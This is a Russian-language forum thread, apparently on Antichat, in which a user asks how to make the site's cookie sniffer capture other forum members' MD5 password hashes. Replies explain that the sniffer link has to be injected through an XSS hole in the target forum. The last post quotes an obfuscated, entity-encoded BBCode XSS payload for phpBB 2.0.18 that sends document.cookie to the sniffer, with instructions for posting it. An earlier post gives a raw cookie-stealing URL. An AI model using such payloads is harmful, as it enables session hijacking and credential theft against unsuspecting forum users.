|
On line snifer Античата!???
Как исполь зовать снифер анти чата?
Неполучается не присылаеет ХЭШ от форума Тока ип и сайт!?? |
Например одним из этих способов http://forum.antichat.ru/thread15678.html
|
www.antichat.ru/sniff/ почитай тут или скачай видео про XSS. наверняка делаешь что-то не так.
|
Нет Меня не совсем поняли!
У Античата есть СНИФЕР по адрессу http://antichat.ru/sniff/ Я отправляю Форумщику сайт http://antichat.ru/cgi-bin/s.jpg?Test Зайдя по ссылке В логе http://antichat.ru/sniff/log.php приходит его IP и форум на котором он находится НО НЕ ПРИХОДИТ хеш MD5 пароля! |
Может кто пример привести??
|
http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
Может что то с куками нао делать? ПРИМЕР ПЛИЗЗ! |
чтоб получить Md5 хеш, грубо говоря, надо сслыку на сниффер внедрить в сам форум, а не дать ссылку (получится тока в том случае если форум уязвим). Об уязвимостях есть куча статей, ищи и найдешь.
|
Ну вот почитай здесь например про уязвимости форумов там описаана XSS и какие коды вставлять в форум я думаю расписано понятно попробуй подправь коды под себя и попробуй кому нибудь отослать данное сообщение с этим кодом...
http://forum.antichat.ru/thread15678.html http://forum.antichat.ru/thread12610.html |
Просто кто нить пример может написать?
|
Цитата:
Вот XSS для phpBB 2.0.18 вставляй в форум только убери * и куки придут на снифер античата... Код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL] |
| Время: 20:08 |